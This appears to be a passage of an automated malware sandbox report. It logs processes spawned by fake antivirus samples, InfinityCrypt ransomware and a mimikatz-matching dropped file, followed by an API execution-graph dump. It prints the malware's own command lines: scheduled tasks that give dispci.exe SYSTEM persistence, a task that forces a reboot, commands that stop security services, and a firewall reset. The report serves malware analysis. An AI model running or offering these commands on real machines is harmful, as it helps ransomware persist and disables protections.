                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:29
                                                                                                                                                            Start time:14:45:56
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:schtasks /Delete /F /TN rhaegal
                                                                                                                                                            Imagebase:0x7ff72c520000
                                                                                                                                                            File size:185856 bytes
                                                                                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:30
                                                                                                                                                            Start time:14:45:57
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:regsvr32 /s c:\windows\mscomctl.ocx
                                                                                                                                                            Imagebase:0xd00000
                                                                                                                                                            File size:20992 bytes
                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:31
                                                                                                                                                            Start time:14:45:57
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1382722661 && exit"
                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                            File size:232960 bytes
                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:32
                                                                                                                                                            Start time:14:45:57
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:195400 bytes
                                                                                                                                                            MD5 hash:248AADD395FFA7FFB1670392A9398454
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 70%, ReversingLabs
                                                                                                                                                            • Detection: 60%, Metadefender, Browse

                                                                                                                                                            Target ID:33
                                                                                                                                                            Start time:14:45:58
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                            Imagebase:0x7ff658c80000
                                                                                                                                                            File size:455656 bytes
                                                                                                                                                            MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:34
                                                                                                                                                            Start time:14:45:58
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:35
                                                                                                                                                            Start time:14:45:59
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:36
                                                                                                                                                            Start time:14:46:01
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1382722661 && exit"
                                                                                                                                                            Imagebase:0xef0000
                                                                                                                                                            File size:185856 bytes
                                                                                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:37
                                                                                                                                                            Start time:14:46:01
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:04:00
                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                            File size:232960 bytes
                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:38
                                                                                                                                                            Start time:14:46:01
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                            File size:82944 bytes
                                                                                                                                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:39
                                                                                                                                                            Start time:14:46:01
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe"
                                                                                                                                                            Imagebase:0xe70000
                                                                                                                                                            File size:2007552 bytes
                                                                                                                                                            MD5 hash:CB02C0438F3F4DDABCE36F8A26B0B961
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 37%, ReversingLabs
                                                                                                                                                            • Detection: 36%, Metadefender, Browse

                                                                                                                                                            Target ID:40
                                                                                                                                                            Start time:14:46:02
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:41
                                                                                                                                                            Start time:14:46:02
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:9421312 bytes
                                                                                                                                                            MD5 hash:C18A7323332B3292A8E0F1C81DF65698
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 62%, ReversingLabs
                                                                                                                                                            • Detection: 56%, Metadefender, Browse

                                                                                                                                                            Target ID:42
                                                                                                                                                            Start time:14:46:02
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1382722661 && exit
                                                                                                                                                            Imagebase:0x7ff7cb270000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:43
                                                                                                                                                            Start time:14:46:03
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:44
                                                                                                                                                            Start time:14:46:03
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\870F.tmp
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\870F.tmp" \\.\pipe\{60F226A4-8E49-484F-BBA1-D3ECC97C63B9}
                                                                                                                                                            Imagebase:0x7ff745e00000
                                                                                                                                                            File size:62328 bytes
                                                                                                                                                            MD5 hash:347AC3B6B791054DE3E5720A7144A977
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: mimikatz, Description: mimikatz, Source: 0000002C.00000002.483707554.00007FF745E0E000.00000004.00000001.01000000.0000001E.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                            • Rule: mimikatz, Description: mimikatz, Source: 0000002C.00000000.445036996.00007FF745E0E000.00000008.00000001.01000000.0000001E.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                            • Rule: mimikatz, Description: mimikatz, Source: 0000002C.00000000.440637562.00007FF745E0E000.00000008.00000001.01000000.0000001E.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                            • Rule: mimikatz, Description: mimikatz, Source: 0000002C.00000000.443106699.00007FF745E0E000.00000008.00000001.01000000.0000001E.sdmp, Author: Benjamin DELPY (gentilkiwi)

                                                                                                                                                            Target ID:45
                                                                                                                                                            Start time:14:46:04
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:04:00
                                                                                                                                                            Imagebase:0xef0000
                                                                                                                                                            File size:185856 bytes
                                                                                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:46
                                                                                                                                                            Start time:14:46:05
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\system32\netsh.exe advfirewall reset
                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                            File size:82944 bytes
                                                                                                                                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:47
                                                                                                                                                            Start time:14:46:05
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:48
                                                                                                                                                            Start time:14:46:22
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:49
                                                                                                                                                            Start time:14:46:16
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\antivirus-platinum.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:c:\windows\antivirus-platinum.exe
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:9728 bytes
                                                                                                                                                            MD5 hash:CD1800322CCFC425014A8394B01A4B3D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:Visual Basic
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 71%, ReversingLabs
                                                                                                                                                            • Detection: 60%, Metadefender, Browse

                                                                                                                                                            Target ID:50
                                                                                                                                                            Start time:14:46:16
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:51
                                                                                                                                                            Start time:14:46:16
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:net stop wscsvc
                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                            File size:46592 bytes
                                                                                                                                                            MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:52
                                                                                                                                                            Start time:14:46:16
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\AppData\Local\6AdwCleaner.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\6AdwCleaner.exe"
                                                                                                                                                            Imagebase:0xa50000
                                                                                                                                                            File size:172648 bytes
                                                                                                                                                            MD5 hash:87E4959FEFEC297EBBF42DE79B5C88F6
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 60%, ReversingLabs
                                                                                                                                                            • Detection: 52%, Metadefender, Browse

                                                                                                                                                            Target ID:53
                                                                                                                                                            Start time:14:46:17
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:net stop winmgmt /y
                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                            File size:46592 bytes
                                                                                                                                                            MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:54
                                                                                                                                                            Start time:14:46:17
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:attrib +h c:\windows\antivirus-platinum.exe
                                                                                                                                                            Imagebase:0x380000
                                                                                                                                                            File size:19456 bytes
                                                                                                                                                            MD5 hash:A5540E9F87D4CB083BDF8269DEC1CFF9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:55
                                                                                                                                                            Start time:14:46:17
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:net start winmgmt
                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                            File size:46592 bytes
                                                                                                                                                            MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:56
                                                                                                                                                            Start time:14:46:17
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe"
                                                                                                                                                            Imagebase:0x660000
                                                                                                                                                            File size:216064 bytes
                                                                                                                                                            MD5 hash:B805DB8F6A84475EF76B795B0D1ED6AE
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 00000038.00000000.470198908.0000000000662000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 00000038.00000000.470518436.0000000000673000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, Author: Joe Security
                                                                                                                                                            • Rule: MALWARE_Win_InfinityLock, Description: Detects InfinityLock ransomware, Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, Author: ditekSHen
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 85%, ReversingLabs
                                                                                                                                                            • Detection: 60%, Metadefender, Browse

                                                                                                                                                            Target ID:57
                                                                                                                                                            Start time:14:46:17
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:net start wscsvc
                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                            File size:46592 bytes
                                                                                                                                                            MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:58
                                                                                                                                                            Start time:14:46:17
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:59
                                                                                                                                                            Start time:14:46:17
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:60
                                                                                                                                                            Start time:14:46:17
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Reset < >

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:18.6%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:6.3%
                                                                                                                                                              Total number of Nodes:1803
                                                                                                                                                              Total number of Limit Nodes:28
                                                                                                                                                              execution_graph 12162 40c78e 12163 40c798 12162->12163 12187 40bfe1 12162->12187 12211 40a250 OemToCharBuffA CharUpperA CharToOemBuffA 12163->12211 12165 40b613 ExpandEnvironmentStringsA 12165->12187 12166 40ca58 12167 40c7a5 12169 405767 3 API calls 12167->12169 12170 40c7fe 12167->12170 12168 40c021 lstrcmpiA 12168->12187 12180 40c84b 12169->12180 12171 40c8dc 12170->12171 12172 405822 GetFullPathNameA 12170->12172 12175 405822 GetFullPathNameA 12171->12175 12172->12171 12173 40c068 GetCurrentDirectoryA 12173->12187 12174 40c2fe SetWindowTextA 12174->12187 12177 40c8ef 12175->12177 12176 405767 3 API calls 12176->12180 12212 40aac2 SHGetMalloc SHGetSpecialFolderLocation SHGetPathFromIDListA 12177->12212 12179 40b7ba 3 API calls 12179->12187 12180->12170 12180->12176 12181 40a224 4 API calls 12181->12187 12182 40c41e RegOpenKeyExA 12184 40c43a RegQueryValueExA RegCloseKey 12182->12184 12182->12187 12183 405bdd MultiByteToWideChar 12183->12187 12184->12187 12185 405fad 10 API calls 12185->12187 12186 40a205 ctype 2 API calls 12186->12187 12187->12165 12187->12166 12187->12168 12187->12173 12187->12174 12187->12179 12187->12181 12187->12182 12187->12183 12187->12185 12187->12186 12188 40b9b0 3 API calls 12187->12188 12193 405bca FindClose 12187->12193 12198 40c3ee SendMessageA 12187->12198 12207 40c0f0 ctype 12187->12207 12189 40c3af GetDlgItem SetWindowTextA SendMessageA 12188->12189 12189->12187 12190 40c988 12199 4058ff 6 API calls 12190->12199 12191 40c8fe 12191->12190 12219 40a59a CompareStringA 12191->12219 12192 40c0f5 SetFileAttributesA 12195 40c1bb GetFileAttributesA 12192->12195 12192->12207 12193->12187 12196 40c1c9 DeleteFileA 12195->12196 12195->12207 12196->12207 12197 406ea5 GetVersionExA 12197->12207 12198->12187 12202 40c9ad 12199->12202 12200 405fad 10 API calls 12200->12207 12201 40c1e6 wsprintfA GetFileAttributesA 12204 40c208 MoveFileA 12201->12204 12201->12207 12214 40a9bd OleInitialize CoCreateInstance 12202->12214 12203 407300 4 API calls 12203->12207 12204->12207 12206 40c9fc 12206->12187 12208 40ca05 SHChangeNotify 12206->12208 12207->12187 12207->12192 12207->12195 12207->12197 12207->12200 12207->12201 12207->12203 12209 40c229 MoveFileExA 12207->12209 12210 40c19a SHFileOperationA 12207->12210 12208->12187 12209->12207 12210->12195 12211->12167 12213 40aaf8 12212->12213 12213->12191 12215 40aab5 OleUninitialize 12214->12215 12216 40a9ef 12214->12216 12215->12206 12217 40aa72 MultiByteToWideChar 12216->12217 12218 40aa9d 12216->12218 12217->12218 12218->12215 12219->12190 11909 40a7d8 11914 40a6c0 11909->11914 11913 40a7e8 11915 40a6d5 11914->11915 11917 40a6e8 11915->11917 11954 40e4da 11915->11954 11918 40a763 11917->11918 11957 402c62 11917->11957 11920 40d33c OleInitialize 11918->11920 11921 40e428 2 API calls 11920->11921 11922 40d358 GetCommandLineA 11921->11922 11923 40d378 GetModuleFileNameA SetEnvironmentVariableA 11922->11923 11924 40d36a 11922->11924 11926 406ea5 GetVersionExA 11923->11926 12026 40b485 11924->12026 11928 40d397 11926->11928 11929 40d39b GetModuleFileNameW 11928->11929 11930 40d3ae 11928->11930 11931 40d3b6 GetModuleHandleA LoadIconA LoadBitmapA 11929->11931 11930->11931 12030 411585 LoadLibraryA LoadLibraryA #17 LoadLibraryA 11931->12030 11933 40d3ee 12035 4098e0 11933->12035 11935 40d3f9 11936 40aca1 3 API calls 11935->11936 11937 40d410 11936->11937 11938 40aca1 3 API calls 11937->11938 11939 40d41a DialogBoxParamA 11938->11939 12040 40648f 11939->12040 11942 40648f OleUninitialize 11943 40d462 11942->11943 12043 4115fd 11943->12043 11947 40d49a DeleteObject 11950 40d4b1 DeleteObject 11947->11950 11951 40d4b4 11947->11951 11948 40d477 ctype 11948->11947 11949 40a205 ctype 2 API calls 11948->11949 11949->11947 11950->11951 11952 40d4ec OleUninitialize ExitProcess 11951->11952 12048 40b6ea WaitForSingleObject 11951->12048 11961 40e428 GetCPInfo 11954->11961 11958 402c6a 11957->11958 11964 402ba2 11958->11964 11962 40e44c IsDBCSLeadByte 11961->11962 11962->11962 11963 40e464 11962->11963 11963->11917 11987 4029f3 11964->11987 11967 40a668 2 API calls 11968 402bd9 11967->11968 11969 402be5 11968->11969 12011 40dd32 11968->12011 11971 40a668 2 API calls 11969->11971 11972 402bf5 11971->11972 11973 402c01 11972->11973 11974 40dd32 2 API calls 11972->11974 11975 40a668 2 API calls 11973->11975 11974->11973 11976 402c11 11975->11976 11977 402c1d 11976->11977 11978 40dd32 2 API calls 11976->11978 11979 40a668 2 API calls 11977->11979 11978->11977 11980 402c2d 11979->11980 11981 402c39 11980->11981 11982 40dd32 2 API calls 11980->11982 11983 40a668 2 API calls 11981->11983 11982->11981 11984 402c49 11983->11984 11985 402c55 11984->11985 11986 40dd32 2 API calls 11984->11986 11985->11918 11986->11985 11988 402a05 11987->11988 12001 402a12 11987->12001 12014 40dbe7 11988->12014 11990 40dbe7 2 API calls 11992 402a24 11990->11992 11998 40a65b ctype 2 API calls 11992->11998 11993 40dbe7 2 API calls 11999 402a3c 11993->11999 11994 402a5a 11997 402a74 11994->11997 12002 40dbe7 2 API calls 11994->12002 11995 402a42 11995->11994 12000 40dbe7 2 API calls 11995->12000 12007 402bab 11997->12007 12010 40a205 ctype 2 API calls 11997->12010 12003 402a2a 11998->12003 12004 40a65b ctype 2 API calls 11999->12004 12005 402a54 12000->12005 12001->11990 12001->12003 12006 402a6e 12002->12006 12003->11993 12003->11995 12004->11995 12008 40a65b ctype 2 API calls 12005->12008 12009 40a65b ctype 2 API calls 12006->12009 12007->11967 12008->11994 12009->11997 12010->12007 12019 40dc02 12011->12019 12015 4012aa ctype 2 API calls 12014->12015 12016 40dbf2 12015->12016 12017 4012aa ctype 2 API calls 12016->12017 12018 40dbfa 12017->12018 12020 40dbcb 2 API calls 12019->12020 12021 40dc16 12020->12021 12022 40dbcb 2 API calls 12021->12022 12023 40dc1e 12022->12023 12024 40dbcb 2 API calls 12023->12024 12025 40dc26 12024->12025 12025->11969 12028 40b49a 12026->12028 12027 40b60c SetEnvironmentVariableA 12027->11923 12028->12027 12029 40a250 OemToCharBuffA CharUpperA CharToOemBuffA 12028->12029 12029->12028 12031 4115ec SHGetMalloc 12030->12031 12032 4115cf GetProcAddress 12030->12032 